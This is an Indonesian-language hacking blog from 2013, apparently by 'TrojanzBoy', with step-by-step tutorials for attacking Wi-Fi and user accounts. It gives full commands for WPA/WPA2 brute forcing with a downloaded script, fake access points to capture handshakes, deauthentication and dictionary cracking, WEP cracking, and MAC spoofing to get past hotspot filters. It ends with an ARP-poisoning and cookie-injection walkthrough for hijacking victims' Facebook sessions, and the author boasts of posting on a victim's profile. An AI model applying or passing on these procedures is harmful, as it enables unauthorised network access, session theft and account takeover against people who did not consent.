Trojanz
Boy
today : | at : | safemode : ON
> / Home / Facebook / Twitter /
name author perms com modified label
Tampilkan postingan dengan label linux hacking. Tampilkan semua postingan
Tampilkan postingan dengan label linux hacking. Tampilkan semua postingan

Hack wpa/wpa2 tanpa wpa handshake (bruteforce) dengan airlin TrojanzBoy rwxr-xr-x 2 10.04

Filename Hack wpa/wpa2 tanpa wpa handshake (bruteforce) dengan airlin
Permission rw-r--r--
Author TrojanzBoy
Date and Time 10.04
Label
Action

tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2

dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake

langsung saja

download toolnya --> https://dl.dropboxusercontent.com/s/1tzd6tli6tj79dl/airlin-1-0-1.rar?token_hash=AAF6R-pzhL9prTTWQnR4xmvb9UhhNImeL49K62F40KOXvw&dl=1

taruh hasil download pada desktop lalu ekstrak dengan perintah
unrar x /root/Desktop/airlin-1-0-1.rar

setelah itu masuk folder airlin
cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh
setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh



pilih interface kalian disini saya menggunakan wlan0

 Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t



disini korban testing saya TrojanzBoy@wifi yang di proteksi wpa2


lalu copy paste essid wifi tersebut


lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/trojanzboy.txt


lalu  isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25


ok tunggu hingga proses brute selesai

dan password pun di temukan



Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake TrojanzBoy rwxr-xr-x 1 20.33

Filename Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake
Permission rw-r--r--
Author TrojanzBoy
Date and Time 20.33
Label
Action

oke langsung saja yapz  .  .
buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng
dengan menggunakan perintah
airmon-ng start wlan0
 ganti wlan0 dengan interface kalian

setelah mode monitor aktik saatnya scanning korban

airodump-ng mon0




target wifi dengan security wpa2 dengan essid =  trojanzboy@wifi channel = 3




setelah selesai menentukan korban

sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney

lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface>
./wifi_honey.sh TrojanzBoy@wifi 3 wlan0


maka terciptalah wifi-wifi palsu





dan tunggu hingga korban connect ke salah satu wifi  dan memasukkan password
tunggu hingga dapat wpa handshake dari akses point yang aslinya






maka wpa handshake yang asli pun kita dapatkan

saatnya pengecrack kan hasil handshake

buka terminal baru masuk directory dengan perintah
 cd /pentest/wireless/wifi-honey

setelah itu cek hasil capture dengan perintah 
ls


setelah menentukan hasil cap sekarang buka masukkan perintah aircrack
aircrack-ng -w /root/Desktop/Trojanzboy.txt /pentest/wireless/wifi-honey/cap-01.cap
 /root/Desktop/Trojanzboy.txt adalah letak wordlist yang telah saya dibuat bisa di kreasikan se kreatif mungkin agar password terpecahkan
dan cari nomer yang ada handshake dari akses point asli




dan tunggu hasilnya



SUKSES bro . . !!!

Hacking hotspot password wpa2-psk TrojanzBoy rwxr-xr-x 2 19.19

Filename Hacking hotspot password wpa2-psk
Permission rw-r--r--
Author TrojanzBoy
Date and Time 19.19
Label
Action
Setelah anda puas berhasil menghack WEP dengan Backtrack  kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.

ok langsung ya

buka terminal pada backtrack

lalu hidupkan mode monitornya disini interface saya wlan0


airmon-ng start wlan0
 setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya

ketikkan perintah

airodump-ng mon0

terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi



ketikkan perintah

 airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0


 ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
         -c 1 = channel yang digunakan broadcast hotspot
          --bssid  94:0C:6D:EE:C2:3F = mac address hotspot
          mon0= mode monitor interface


Jika dibarisan bawah terdapat station client yang terhubung dengan AP



selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :

aireplay-ng --deauth 10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0




 Ket= --deauth 10 = mode penyerangan sampai 10x
         -a = mac adress hotspot
         -c = client yang terhubung hotspot yaitu

ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake




ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja

Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.

Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan  
 aircrack-ng -w '/root/Desktop/TrojanzBoyword.txt' wpa2-01.cap
keterangan :
-w '/root/Desktop/TrojanzBoyword.txt = Letak wordlist/dictionary saya namakan TrojanzBoy.txt

wpa2-01.cap = hasil capture pada airodump-ng tadi

 tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan 




Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya
cara menggunkan crunch bisa dilihat di  http://trojanzboy.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html

Hacking hotspot password wep TrojanzBoy rwxr-xr-x 0 05.15

Filename Hacking hotspot password wep
Permission rw-r--r--
Author TrojanzBoy
Date and Time 05.15
Label
Action
tutor kali ini akan membaha tentang hacking wifi dengan security type wep

ok langsung ya

buka terminal pada backtrack

lalu hidupkan mode monitornya disini interface saya wlan0

airmon-ng start wlan0
 setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya

ketikkan perintah

airodump-ng mon0


terus cari wifi yan g terkunci dengan enkripsi WEP

disini saya akan menyerang wifi trojanzboy@wifi


setelah menentukan target langsung saja kita berhentikan scanningnya dengan menekan ctrl + c


dan masukkan perintah

airodump-ng -c 1 -w wep --bssid 94:0c:6d:ee:c2:3f mon0


keterangan
-c        = channel korban bisa di lihat di keterangan pada scanningnya
-w       = output hasil scanning disini saya namakan wep
--bssid = mac address wifi korban
mon0   = mode monitor nya


setelah itu kita melihat data yang bertebaran pada wifi korban beserta beaconya


setelah itu tekan shift + t untuk membuka tab baru pada terminal
dan masukkan perintah

aireplay-ng -1 0 -a 94:0c:6d:ee:c2:3f mon0


ket
-a = bssid korban

setelah itu kita melihat sukses atau tidak pada mode deauth tadi
jika success association succesful berarti kita sukses dan kita lanjut pada mode penyerangan selanjutnya

ketikkan perintah
aireplay-ng -3 -b 94:0c:6d:ee:c2:3f mon0


dan tunggu sampai kita mendapatkan data pada mode monitor tadi
ingat data yang diperlukan sampai 30000 lebih ya



wow ternyata data sudah sampai 30000 sekarang saatnya proses pengcrackan data tersebut
ketikkan perintah

aircrack-ng wep-01.cap


ket = jangan lupa nama capture tadi ya pada scanning dengan airodump

DAN PASSWORDNYA AKHIRNYA DITEMUKAN 0321861433

Mengganti mac address pada linux backtrack TrojanzBoy rwxr-xr-x 0 05.08

Filename Mengganti mac address pada linux backtrack
Permission rw-r--r--
Author TrojanzBoy
Date and Time 05.08
Label
Action

apa itu mac address
MAC (Medium Access Control) Address atau Physical Address adalah setara dengan nomor seri Kartu Jaringan (Network  Interface Card/NIC). Setiap alamat MAC adalah unik yang panjangnya terdiri dari 48 bit. 24 bit pertama dari MAC Address merepresentasikan vendor pembuat kartu tersebut  dan 24 bit sisanya merepresentasikan nomor kartu tersebut.  Pada lapisan OSI (Open System Interconnection) MAC Address menempati lapisan Data Link Layer (layer kedua setelah Physical Layer).

ok kita langsung saja

buka terminal

dan kita cek dulu interface yang tersedia

airmon-ng



Disini saya akan merubah mac address usb wifi saya yang mempunyai interface wlan0

sebelumnya kita down kan dulu interfacenya

ifconfig wlan0 down

 setelah itu mulailah merubah mac address nya
disini say merubahnya 00:11:22:33:44:55

macchanger -m 00:11:22:33:44:55 wlan0


setelah itu kita hidupkan lagi denag perintah up

ifconfig wlan0 up

dan sukes


cara ini bisa digunakan untuk mengakali hotspot yang memakai filter

Hack login dengan menggunakan cookies TrojanzBoy rwxr-xr-x 4 09.38

Filename Hack login dengan menggunakan cookies
Permission rw-r--r--
Author TrojanzBoy
Date and Time 09.38
Label
Action
Ettercap memang selalu menjadi tools yang paling ampuh untuk aksi seorang peretas saat ini, bagaimana jika aksi MITM yg satu ini kita kombinasikan dengan Wireshark dan Cookies Injector...???

Kali ini serangan yg kita tujukan ialah mereka yg sedang mengakses akun Facebook.
mengapa Facebook..???
saya mengambil judul Facebook agar bisa menjawab pertanyaan anda yg mungkin sampai saat ini belum berhasil mencuri account facebook krn terbentur saat mengatur susunan cookies yg menurut saya susah-susah gampang lah.
Tapi tenang saja, pada tulisan saya kali ini saya akan membuatnya lebih rinci dan mudah untuk kalian ingat, mengingat kalian tidak perlu menyusun cookies yang hanya bisa membuat kepala kalian pusing.

Equipment :
Ettercap = melakukan serangan "Man-in-the-middle attack" Arp Poisoning
Wireshark = melakukan Analys Troubleshooting di sebuah jaringan.
GreaseMonkey (addons mozilla) = Menyusun halaman web dengan menggunakan potongan-potongan kecil JavaScript.
Cookies Injector = Menyuntikkan string cookie yang ditangkap di paket Wireshark.

[Addons mozilla firefox]
Add and download lalu Install --> greasemonkey & cookie-injection

greasemonkey


Cookies Injector


 pertama buka ettercap pada terminal dengan megetikkan
ettercap -G






Maka akan muncul Ettercapnya.
Kemudian klik Tab Sniff => Unified Sniffing
seterusnya pada kolom Network Interface = Masukan Interface yg kalian gunakan, disini saya memakai Wlan0 





kemudian lakukan tahap scanning untuk melihat IP Address yg terhubung dalam jaringan.
klik Tab HOSTS dan pilih Scann For Hosts dan tunggu hingga selesai.
kemudian klik Tab HOSTS dan pilih Hosts List untuk melihat host yg lagi terkoneksi




OK. Selanjutnya kita memilih IP korban.

Pada Hosts List diatas saya memilih :
Gateway = 192.168.1.1 Add to Target 1, dan
IP 192.168.1.10 Add to Target 2



Q : Bagaimana jika Target lebih dari satu ???
A : Simple, saya beri contoh seperti ini :
misalkan ada 4 Hosts list, yaitu :

192.168.1.1 (Gateway)
192.168.1.2 (Ip korban)
192.168.1.4 (Ip korban)
192.168.1.8 (Ip korban)
caranya adalah :
saya masukkan gateway 192.168.1.1 Add to Target 1,
dan masukan IP korban 192.168.1.2  Add to Target 2,
kemudian ulangi masukkan gateway 192.168.1.1 Add to Target 1,
dan masukan IP korban 192.168.1.3 / 192.168.1.4 Add to Target 2

begitu seterusnya :)

oke saya anggap tidak ada masalah dan kita lanjut ke tahap berikutnya =))

Klik Tab MITM => Arp Poisoning kemudian beri cek list Sniff Remote Connections . klik OK




selanjutnya untuk menjalankan Sniffing, Klik Tab START dan Pilih Start Sniffing.





lalu setelah selesai sniffing sekarang waktunya buka wireshark
di terminal ketikkan

wireshark



maka akan muncul Wireshark-nya.


selanjutnya ubah settingan dengan menekan Ctrl+K atau Capture ==> Capture Options
 dan pilih interface kalian

  kemudian Beri cheklist pada bagian
- enable network name resolution






kemudian klik start.

next, ketik http.cookies pada colom Filter (ENTER)



tunggu hingga muncul target yang mengakses facebook.

NOTE : ada banyak warna bermunculunan untuk capture yg terekam namun tidak semua bisa menerima upaya agar kita dapat mengakses facebook melalui cookienya. pilih Capture facebook yang berwarna hitam agar cookie bekerja dengan semestinya :)

oke, selanjutnya tentukan target kemudian klik kanan ==>> Copy ==>> Bytes ==>> Printable Text Only


  maka kita mendapatkan cookies korban.

selanjutnya buka browser Mozilla-Firefox kalian dan langsung mengakses http://www.facebook.com.
kemudian tekan tombol Alt+C untuk menjalankan Cookies Injector. maka akan muncul kolom Wireshark Cookie Dump dan kemudian pastekan cookies yg sudah kita ambil lalu klik OK.





Tahap akhir lakukan refresh pada halaman facebook. makan akan membawa kita ke page home facebook si korban.






SUCCESS...!!!


=)) dan saya hanya meninggalkan kenang-kenangan di facebook korban dengan mengupdate status =)) 
 

2013 ./TrojanzBoy